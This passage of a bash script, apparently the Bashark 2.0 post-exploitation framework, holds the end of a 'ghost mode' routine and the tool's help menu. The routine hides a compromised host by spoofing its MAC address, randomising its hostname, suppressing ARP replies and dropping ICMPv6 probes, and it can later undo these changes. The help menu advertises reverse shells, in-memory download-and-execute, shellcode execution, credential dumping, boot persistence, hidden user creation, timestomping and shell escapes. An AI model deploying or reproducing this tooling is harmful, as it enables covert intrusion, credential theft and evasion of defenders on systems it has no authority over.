--protocol icmpv6 --icmpv6-type echo-request -j DROP 1669 | ip6tables -I INPUT 2 -i $INTERFACE --protocol icmpv6 --icmpv6-type neighbor-solicit -j DROP 1670 | print_info 'Reinitializing network interface ...' 1671 | print_info 'If not connected or taking too long - reconnect manually' 1672 | if [[ $CMD =~ .*ifconfig ]]; then 1673 | $CMD $INTERFACE up 1674 | else 1675 | $CMD link set $INTERFACE up 1676 | fi 1677 | /etc/init.d/network-manager start &>/dev/null 1678 | hostname > $ORGHOST 1679 | hostnamectl set-hostname $RANDOM 1680 | print_good 'New hostname : '$(hostname) 1681 | xauth add $(hostname)/$(xauth list | cut -d '/' -f 2 | tail -n 1) 1682 | chown $(echo $XAUTHORITY | cut -d '/' -f 3): $XAUTHORITY 2>/dev/null 1683 | print_question 'Perform DHCP (unless you want to specify your own IP)? (y/n)' 1684 | read dhcp 1685 | dhcp=${dhcp,,*} 1686 | dhcp=${dhcp::1} 1687 | if [[ "$dhcp" = "y" ]] 1688 | then 1689 | dhclient $INTERFACE &> /dev/null 1690 | fi 1691 | if [[ $CMD =~ .*ip ]] 1692 | then 1693 | print_info 'Erasing previous IP...' 1694 | sleep 4 1695 | $CMD addr del $(ip addr show dev $INTERFACE | grep second | cut -d ' ' -f 6 | cut -d '/' -f 1) dev $INTERFACE 1696 | fi 1697 | print_good "{magenta}Ghost mode enabled{reset}" 1698 | elif [[ "$SWITCH" = "off" ]] 1699 | then 1700 | if [ ! $(which ethtool) ] && [ ! -f /etc/udev/rules.d/70-persistent-net.rules ] 1701 | then 1702 | ORGMAC=$( cat $TMPMAC ) 1703 | else 1704 | if [[ $(which ethtool) ]] 1705 | then 1706 | ORGMAC=$(ethtool -P $INTERFACE) 1707 | ORGMAC=${ORGMAC#*:} 1708 | else 1709 | ORGMAC=$(cat /etc/udev/rules.d/70-persistent-net.rules | grep $INTERFACE | cut -d '"' -f 8) 1710 | fi 1711 | fi 1712 | print_info 'Reinitializing MAC address ...' 1713 | echo 1714 | /etc/init.d/network-manager stop &>/dev/null 1715 | if [[ $CMD =~ .*ifconfig ]]; then 1716 | $CMD $INTERFACE down 1717 | $CMD $INTERFACE hw ether $ORGMAC 1718 | else 1719 | $CMD link set $INTERFACE down 1720 | $CMD link set dev $INTERFACE address $ORGMAC 1721 | fi 1722 | if [[ $? -ne 0 ]] 1723 | then 1724 | print_error "Wrong interface" 1725 | exit 3 1726 | fi 1727 | print_info 'Reconfiguring kernel to normal ARP/NDP linking network mode ...' 1728 | sysctl net.ipv4.conf.$INTERFACE.arp_ignore=0 > /dev/null 1729 | sysctl net.ipv4.conf.$INTERFACE.arp_announce=0 > /dev/null 1730 | ip6tables -D INPUT -i $INTERFACE --protocol icmpv6 --icmpv6-type echo-request -j DROP 1731 | ip6tables -D INPUT -i $INTERFACE --protocol icmpv6 --icmpv6-type neighbor-solicit -j DROP 1732 | print_info 'Restoring hostname ...' 1733 | xauth remove $(hostname)/$(xauth list | cut -d '/' -f 2 | tail -n 1) 2>/dev/null 1734 | chown $(echo $XAUTHORITY | cut -d '/' -f 3): $XAUTHORITY 2>/dev/null 1735 | hostnamectl set-hostname $(cat $ORGHOST) 1736 | print_info 'Reinitializing network interface ...' 1737 | print_info 'If not connected or taking too long - reconnect manually' 1738 | if [[ $CMD =~ .*ifconfig ]]; then 1739 | $CMD $INTERFACE up 1740 | else 1741 | $CMD link set $INTERFACE up 1742 | fi 1743 | /etc/init.d/network-manager start &>/dev/null 1744 | print_question 'Perform DHCP (unless you want to specify your own IP)? (y/n)' 1745 | read dhcp 1746 | dhcp=${dhcp,,*} 1747 | dhcp=${dhcp::1} 1748 | if [[ "$dhcp" = "y" ]] 1749 | then 1750 | dhclient $INTERFACE &> /dev/null 1751 | fi 1752 | sleep 2 1753 | /etc/init.d/network-manager restart &>/dev/null 1754 | rm -f $TMPMAC 1755 | print_good "{magenta}Ghost mode disabled{reset}" 1756 | fi 1757 | fi 1758 | fi 1759 | } 1760 | 1761 | ##Help command 1762 | #Finish and add mod command 1763 | help(){ 1764 | echo " 1765 | Bashark ver. 2.0 Commands: 1766 | 1767 | (${green}no root required${reset}): 1768 | ${bold}_${reset}${green} -> ${reset}Go back to previous directory 1769 | ${bold}bruteforce${reset}${green} -> ${reset}Perform a dictionary attack against a protected file 1770 | ${bold}c${reset}${green} -> ${reset}Clear screen 1771 | ${bold}cleanup${reset}${green} -> ${reset}Modify Bashark cleanup routine settings 1772 | ${bold}cve${reset}${green} -> ${reset}Search for a kernel exploit 1773 | ${bold}esc${reset}${green} -> ${reset}Escape to a non-restricted shell 1774 | ${bold}fnd${reset}${green} -> ${reset}Recursively search for string occurrence in current directory 1775 | ${bold}fndre${reset}${green} -> ${reset}Search for most popular regullar expressions in a file 1776 | ${bold}fileinfo${reset}${green} -> ${reset}Inspect a file 1777 | ${bold}getapp${reset}${green} -> ${reset}Enumerate installed applications 1778 | ${bold}getconf${reset}${green} -> ${reset}Enumerate configuration files 1779 | ${bold}getdbus${reset}${green} -> ${reset}List all available Dbus services 1780 | ${bold}getidle${reset}${green} -> ${reset}List active PTYs and their idle time 1781 | ${bold}getperm${reset}${green} -> ${reset}Show files and folders with special permissions 1782 | ${bold}getsec${reset}${green} -> ${reset}Search for dereferences and presence of three most popular mac programs 1783 | ${bold}help${reset}${green} -> ${reset}Show this help message 1784 | ${bold}hosts${reset}${green} -> ${reset}Enumerate active hosts in background 1785 | ${bold}keyinstall${reset}${green} -> ${reset}Add a RSA key to list of authorized SSH keys 1786 | ${bold}isvm${reset}${green} -> ${reset}Check if os is running on virtual machine 1787 | ${bold}jshell${reset}${green} -> ${reset}Establish a reverse interactive javascript shell 1788 | ${bold}ldexec${reset}${green} -> ${reset}Execute a file without permission bit set 1789 | ${bold}lg${reset}${green} -> ${reset}Search for regular expression in filenames of current directory 1790 | ${bold}mex${reset}${green} -> ${reset}Make file executable 1791 | ${bold}memexec${reset}${green} -> ${reset}Download and execute remote bash script in memory 1792 | ${bold}mkd${reset}${green} -> ${reset}Create a directory 1793 | ${bold}mod${reset}${green} -> ${reset}Modify every file in current directory with given extension 1794 | ${bold}portscan${reset}${green} -> ${reset}Perform a portscan 1795 | ${bold}quit${reset}${green} -> ${reset}Exit bashark 1796 | ${bold}revshell${reset}${green} -> ${reset}Spawn a reverse shell 1797 | ${bold}revshellgen${reset}${green} -> ${reset}Generate a reverse shell in different formats 1798 | ${bold}shellcode${reset}${green} -> ${reset}Execute shellcode provided in "\x" escaped form 1799 | ${bold}t${reset}${green} -> ${reset}Create a file 1800 | ${bold}timestomp${reset}${green} -> ${reset}Change attributes of a file 1801 | ${bold}usrs${reset}${green} -> ${reset}Show all users on the host 1802 | ${bold}xml_dos${reset}${green} -> ${reset}Create a xml or yaml dos file 1803 | ${bold}xxe${reset}${green} -> ${reset}Generate a xml external entity injection file 1804 | 1805 | (${red}root required${reset}): 1806 | ${bold}linikatz${reset}${red} -> ${reset}Enumerate plaintext and in-memory credentials 1807 | ${bold}portblock${reset}${red} -> ${reset}Block all opened ports except whitelisted 1808 | ${bold}persist${reset}${red} -> ${reset}Set a command to be executed after every boot 1809 | ${bold}rootshell${reset}${red} -> ${reset}Create a rootshell 1810 | ${bold}usradd${reset}${red} -> ${reset}Create a new hidden user (osx only) 1811 | ${bold}forward${reset}${red} -> ${reset}Perform ssh port forwarding 1812 | 1813 | To show additional information about specific command, type ' -h' 1814 | " 1815 | } 1816 | 1817 | 1818 | 1819 | --------------------------------------------------------------------------------